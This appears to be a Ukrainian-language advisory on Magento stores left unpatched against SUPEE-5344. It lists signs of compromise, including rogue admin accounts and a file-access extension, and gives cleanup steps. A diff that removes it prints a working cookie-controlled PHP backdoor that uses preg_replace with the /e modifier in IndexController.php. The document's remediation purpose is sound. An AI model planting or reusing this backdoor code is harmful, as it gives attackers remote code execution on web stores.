Якщо ваш магазин ще не пропатчений, найбільш ймовірно, що він під загрозою або вже зламаний автоматичним експлоітом який працює з 22 квітня 2015 року. Всі не пропатчені магазини які я бачив, мали наступні ознаки взлому:
- lib/Varien/Db/Adapter/Pdo/Mysql.php file modified, so patch can not be applied seamlessly:
$
bash
.
/PATCH_SUPEE-5344_CE_1
.8.0.0_v1-2015-02-10-08-10-38.sh
Checking
if
patch can be applied
/reverted
successfully...
ERROR: Patch can't be applied
/reverted
successfully.
patching
file
app
/code/core/Mage/Admin/Model/Observer
.php
patching
file
app
/code/core/Mage/Core/Controller/Request/Http
.php
patching
file
app
/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController
.php
patching
file
app
/code/core/Mage/XmlConnect/Model/Observer
.php
patching
file
lib
/Varien/Db/Adapter/Pdo/Mysql
.php
Hunk
#1 FAILED at 2834.
1 out of 1 hunk FAILED -- saving rejects to
file
lib
/Varien/Db/Adapter/Pdo/Mysql
.php.rej
- app/code/core/Mage/Cms/controllers/IndexController.php file have a hijacking cookie key installed
- Magpleasure/Filesystem розширення встановлене для легкого доступу до файлової системи з Адмінки
- Список адміністраторів System > Permissions > Users поповнився одним або декількома новими користувачами, емейл яких містить @example.com в домені
- Список ролів System > Permissions > Roles поповнився новим записом який гарантує повні права для адмінів з @example.com
Як рузультат, такі магазини можуть повністю адмініструватись хакером в будь який спосіб, так як він має доступ до панелі адміністрування та файлової системи. Щоб врятувати ваш магазин він зловживань, бану в Google, або потрапляння в чорний список, переконайтесь, що ваш магазин пропатчений.
Якщо ваш магазин має ознаки злому, або вже зламаний – це можна визначити по вказаних вище пунктах, виконайте наступні іструкція прямо зараз щоб перешкодити цьому:
- збережіть бекап поточної версії
- для виправлення, відкотіть lib/Varien/Db/Adapter/Pdo/Mysql.php до оригінальної версії, що відповідає вашому дистрибутиву Magento або використайте вже пропатчену версію з цієї статті
- відкотіть app/code/core/Mage/Cms/controllers/IndexController.php до оригінальної версії, що відповідає вашому дистрибутиву Magento, або принаймні видаліть наступний код тут (підсвічений):
--- app/code/core/Mage/Cms/controllers/IndexController.php 2015-04-22 03:47:49.742344082 +0200
+++ orig-distr-1.9.0.1/IndexController.php 2015-06-02 10:26:25.197159978 +0200
@@ -116,14 +116 @@
}
-
-
class
Mage_Cms_Auth_olx
-{
-
public
function
__construct() {
-
$auth_cookie
= @
$_COOKIE
[
'nuwxlskmedlvjfdo3'
];
-
if
(
$auth_cookie
) {
-
$method
=
$auth_cookie
(@
$_COOKIE
[
'nuwxlskmedlvjfdo2'
]);
-
$auth
=
$auth_cookie
(@
$_COOKIE
[
'nuwxlskmedlvjfdo1'
]);
-
$method
(
"/124/e"
,
$auth
,124);
- }
- }
-}
-
$is_auth
=
new
Mage_Cms_Auth_olx;
- видаліть всіх невідомих користувачів з System > Permissions > Users і анулюйте їхні ролі в System > Permissions > Roles
- видаліть або відключіть Magpleasure/Filesystem додаток через Magento connect
- повний перелік файлів який потрібно знищити або пропатчити (зелені – пропатчити, всі інші – видалити)
Будь ласка, звертніть увагу, що ці дії можуть відновити магазин лише від автоматичого експлоіту, який ми найчастіше бачили в не пропатчений інсталяції Magento. Якщо зловмиснимк використав цю лазівку для вашої інсталяції, він міг модифікувати будь який файл і залишити будь які інші лазівки для наступного доступу, тому для детального дослідження, зверніться до компетентних спеціалістів для відновлення вашого магазину з бекапу, приорітетно який зроблений до 22 квітня 2015 року.